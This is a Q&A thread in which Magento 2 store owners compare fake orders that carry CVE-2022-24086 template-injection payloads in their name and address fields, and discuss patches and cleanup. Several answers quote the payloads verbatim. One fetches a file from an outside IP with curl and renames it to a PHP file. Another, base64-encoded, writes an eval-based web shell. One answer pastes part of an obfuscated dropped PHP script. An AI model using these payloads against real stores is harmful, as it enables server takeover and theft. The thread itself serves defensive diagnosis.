# Magento 2: Fake customer order came through with weird code instead of customer name

Tags: magento2, orders, security

Just had a fake order come through on my Magento 2 website. The address is nonsense and instead of a customer name it had this code:

```
{{
 var this.getTemplateFilter().filter($order.shipping_address.city)
}}{{
  var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)
}}
```

Can anyone tell me what it was they're trying to do? There's no payment details attached, it looks like they didn't go through to payment.

Comment: Yes, i have had the same thing happen 3 times over the last two weeks. Running M2.4.3

Comment: What is Magento version are you use? I guess those orders were placed with API and you need to enable recaptcha for place order for prevent such this in future. ReCaptcha for order available since 2.4.3 as I correctly remember. I suggest to analyze logs for IP behavior as well.

Comment: One of my client is using 2.4.0 and getting same issue.

Comment: how to resolve this issue

Comment: Enable captcha may be it causes security vulnerability in future so secure your store today not tomorrow.

Comment: It's a Trojan Order attack for CVE 2022-24086. It is harmless if you have updated Magento. More info here: https://sansec.io/research/trojanorder-magento

Answer (score 2):

I am running Magento 2.4.5 and had an order come in with a similar string:

```
{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(bHMgLWFs
3001 W OLD YANKTON RD
)}},
```

I could not see any file modifications, so it looks like this is the first stage of the attack, where an order is placed via the API. The likelihood is that this order could be raised because the guest API was turned on:

[image: Web API Security - anonymous access turned on]

The exploit is triggered by a page load in admin. If that string isn't sanitized, the script executes and installs the payload.

Ref: https://sansec.io/research/trojanorder-magento

You should check the file modification dates for anything after that order was placed. If you find there are changes, then I would advise a thorough review of the code (and likely a reinstall if suspicious), ensuring you have either applied the patch or upgraded to >=2.4.4.

---

It is slightly concerning as this exploit should not execute in Magento >=2.4.4....

Answer (score 2):

Had the same thing happen to one of my stores. Thankfully the patch prevented any damage. But I noticed that the hacker managed to place a Guest order despite guest checkout being disabled. The hacker used the Rest API which still allows guest orders being placed even when they are disabled.
I created a bug about that which hopefully will be fixed
https://github.com/magento/magento2/issues/36691

Answer (score 1):

They are trying to upload a file to your Magento 2 pub directory...  At least that's what looks like they are doing to us (2.4.3-p1).  We discovered that a file 'engm.php' (and others) had been added to our '/pub' directory and received similar spam orders referencing that file.  The engm.php file has HTML form upload fields.

There must be a Magento 2 exploit.  Interested to know more.  We also found that the Trojan:JS/Cryxos javascript had been injected into one of our JS files (in /pub).

Answer (score 1):

Magento 2.4.4-p2 - one order placed with the following value in the firstname

```
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(pwd)}}
```

There are no files added in the **pub** directory, no new admin users, no scripts added in HTML Head or in Footer. This version of Magento (2.4.4-p2) should have all the security patches applied, so it should be fine even if they were able to place order with the code snippet.

Answer (score 0):

I had the same issue yesterday. No order supposed to be placed over API. Using M2.4.1

order name value was :

```
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(curl${IFS%??}-O${IFS%??}http://193.169.254.211/cool.txt;mv${IFS%??}cool.txt${IFS%??}engm.php")}} smith
```

Answer (score 0):

You might look into the patches that cover CVE-2022-24086. https://helpx.adobe.com/security/products/magento/apsb22-12.html
It is an improper input validation vulnerability that can start as malicious code in an order replacing the name of the customer.

Comment: Had same thing happen just now with customer on 2.4.4.

Answer (score 0):

Same issue on version 2.4.4

Customer Address given:

```
{{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(bHMgLWFs
3001 W OLD YANKTON RD
)}}, California, 94123
United States
```

They added the following files to the pub folder:

```
pdo.php
web_system.php
cron_check.php
```

The customer order was generated under IP 88.218.80.38, but the files were accessed via 2a0b:f4c1:2::243

Answer (score 0):

I also had nearly the same yesterday, just slightly different code in the customer shipping name field:

```
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(pwd)}}
```

I live in a relatively small country, but still the address, phone number and the email address seemed to be nearly normal and local.
Even the payment has gone through (weirdly enough), but I suppose they used a stolen credit card information for this.

I had 2.4.4 when that happened and I put the store in maintenance yesterday, now running 2.4.5-p1.
From what I can see, there are no new files in the /pub-folder.

Answer (score 0):

We also got this attack. They added an admin user, one script at the HTML head, and a PHP file under /pub. These have been removed (luckily founded these quickly), and all pw updated. Also, we are updating Magento / extensions to the newest versions.

But any suggestion on how to make 100% sure we have found all modifications they have made? Maybe Sansec scanner?

Thanks!

Comment: What Magento version?

Answer (score 0):

I also had this error yesterday with code:

```
{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(pwd)}}
```

In my case, there are no new files in the /pub-folder. But I had Magento 2.4.5 version and figure it out with composer update.

Answer (score 0):

```
You must delete this fake order, someone is trying to access/upload script file in your pub directory in future soon, also enable google captcha security.

script might be like as:

    <?php
error_reporting(0);header('Content-Type: text/html; charset=utf-8');$ooooOO0 = 'y9151';$O='';date_default_timezone_set('Asia/Tokyo');
$dRoot = @$_SERVER['DOCUMENT_ROOT'];
$rUrl = @$_SERVER['REQUEST_URI'];
$curName = @basename(__FILE__);
$sName = @$_SERVER['HTTP_HOST'];
$O0_OO0_0Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$uAgent = @$_SERVER['HTTP_USER_AGENT'];
$referer = @$_SERVER['HTTP_REFERER'];
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$typeName = $http_type . $sName;
$uAgent = @strtolower($uAgent);
$referer = @strtolower($referer);
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
?>
```

Answer (score 0):

An order similar to this came in today on our Magento 2.4 website, this code was in the Billing Info field. We have reCaptcha enabled. I'm not sure how the "if" functions here instead of "var".

```
if this.getTemplateFilter().filter(dummy)/if errorif this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIGVjaG8gIk9LIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsicXdxIl0pKTsgJyA+IGhlYWx0aF9jaGVjay5waHA=)m/if
```

Answer (score 0):

this just happen with ver. 2.4.6-p2

Comment: Sansec released a sheet with security bulleting compilation, sounds like 2.4.6-p2 is in fact still affected, while 2.4.6-p3 not anymore: https://docs.google.com/spreadsheets/d/17w2TxP0Vw-ik45yNwVTW8orfoIKOXCtvBpIFvbEKiTY/edit#gid=0